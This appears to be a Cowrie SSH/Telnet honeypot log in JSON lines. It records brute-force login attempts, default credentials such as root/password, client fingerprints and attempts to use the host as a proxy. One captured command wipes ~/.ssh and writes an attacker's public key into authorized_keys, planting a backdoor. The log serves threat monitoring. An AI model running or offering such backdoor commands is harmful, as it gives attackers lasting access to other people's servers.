{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:27:49.469609Z","src_ip":"212.227.235.229","session":"8aa9c37c9aa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55378,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c52735a2843","protocol":"ssh","message":"New connection: 212.227.125.160:55378 (1.2.3.4:22) [session: 0c52735a2843]","sensor":"my-vps","timestamp":"2025-08-28T11:28:29.359746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:28:29.360770Z","src_ip":"212.227.125.160","session":"0c52735a2843"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:28:29.529998Z","src_ip":"212.227.125.160","session":"0c52735a2843"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T11:28:30.155985Z","src_ip":"212.227.125.160","session":"0c52735a2843"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:28:31.327656Z","src_ip":"212.227.125.160","session":"0c52735a2843"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57373,"dst_ip":"1.2.3.4","dst_port":23,"session":"b7b72c8f8449","protocol":"telnet","message":"New connection: 212.227.125.160:57373 (1.2.3.4:23) [session: b7b72c8f8449]","sensor":"my-vps","timestamp":"2025-08-28T11:28:34.027038Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:28:46.824323Z","src_ip":"212.227.125.160","session":"feeb2afa84a9"}
{"eventid":"cowrie.session.closed","duration":30.76093602180481,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:04.787900Z","src_ip":"212.227.125.160","session":"b7b72c8f8449"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33370,"dst_ip":"1.2.3.4","dst_port":22,"session":"e96e6660d901","protocol":"ssh","message":"New connection: 212.227.235.229:33370 (1.2.3.4:22) [session: e96e6660d901]","sensor":"my-vps","timestamp":"2025-08-28T11:29:04.940974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:29:04.942049Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:29:05.159644Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":56629,"dst_ip":"1.2.3.4","dst_port":22,"session":"3afca78dd264","protocol":"ssh","message":"New connection: 193.105.134.95:56629 (1.2.3.4:22) [session: 3afca78dd264]","sensor":"my-vps","timestamp":"2025-08-28T11:29:05.868178Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-PuTTY_Release_0.62","message":"Remote SSH version: SSH-2.0-PuTTY_Release_0.62","sensor":"my-vps","timestamp":"2025-08-28T11:29:05.868980Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-28T11:29:05.913705Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.login.success","username":"root","password":"Amir1234","message":"login attempt [root/Amir1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:29:06.297605Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:29:06.838923Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:29:06.883399Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:29:06.884062Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T11:29:06.884933Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":17330,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:17330","sensor":"my-vps","timestamp":"2025-08-28T11:29:06.886466Z","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T11:29:06.931482Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":29454,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:29454","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.063108Z","session":"3afca78dd264"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.104062Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.107753Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"193.105.134.95","src_port":10071,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10071","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.239182Z","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.283934Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"193.105.134.95","src_port":752,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:752","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.415124Z","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T11:29:07.460043Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T11:29:08.064209Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.065008Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"193.105.134.95","src_port":26350,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:26350","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.067926Z","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.112812Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"193.105.134.95","src_port":26067,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:26067","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.251187Z","session":"3afca78dd264"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.285826Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.287230Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.295967Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.341240Z","src_ip":"193.105.134.95","session":"3afca78dd264"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33374,"dst_ip":"1.2.3.4","dst_port":22,"session":"349bbff2692f","protocol":"ssh","message":"New connection: 212.227.235.229:33374 (1.2.3.4:22) [session: 349bbff2692f]","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.512479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:29:08.808541Z","src_ip":"212.227.235.229","session":"349bbff2692f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47822,"dst_ip":"1.2.3.4","dst_port":22,"session":"7332d81a6025","protocol":"ssh","message":"New connection: 212.227.125.160:47822 (1.2.3.4:22) [session: 7332d81a6025]","sensor":"my-vps","timestamp":"2025-08-28T11:29:09.318104Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:29:09.456482Z","src_ip":"212.227.235.229","session":"349bbff2692f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:29:09.480117Z","src_ip":"212.227.125.160","session":"7332d81a6025"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:29:09.521139Z","src_ip":"212.227.125.160","session":"7332d81a6025"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T11:29:10.176563Z","src_ip":"212.227.125.160","session":"7332d81a6025"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:11.349593Z","src_ip":"212.227.125.160","session":"7332d81a6025"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T11:29:12.078766Z","src_ip":"212.227.235.229","session":"349bbff2692f"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:13.661500Z","src_ip":"212.227.235.229","session":"349bbff2692f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46286,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d8029920f46","protocol":"ssh","message":"New connection: 212.227.235.229:46286 (1.2.3.4:22) [session: 9d8029920f46]","sensor":"my-vps","timestamp":"2025-08-28T11:29:13.719733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T11:29:13.720883Z","src_ip":"212.227.235.229","session":"9d8029920f46"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T11:29:13.947231Z","src_ip":"212.227.235.229","session":"9d8029920f46"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T11:29:14.894135Z","src_ip":"212.227.235.229","session":"9d8029920f46"}
{"eventid":"cowrie.session.closed","duration":"10.2","message":"Connection lost after 10.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:15.119708Z","src_ip":"212.227.235.229","session":"e96e6660d901"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T11:29:15.121349Z","src_ip":"212.227.235.229","session":"9d8029920f46"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43932,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d8209357592","protocol":"ssh","message":"New connection: 212.227.125.160:43932 (1.2.3.4:22) [session: 9d8209357592]","sensor":"my-vps","timestamp":"2025-08-28T11:29:49.074288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T11:29:49.075325Z","src_ip":"212.227.125.160","session":"9d8209357592"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T11:29:49.246866Z","src_ip":"212.227.125.160","session":"9d8209357592"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-28T11:29:49.763473Z","src_ip":"212.227.125.160","session":"9d8209357592"}
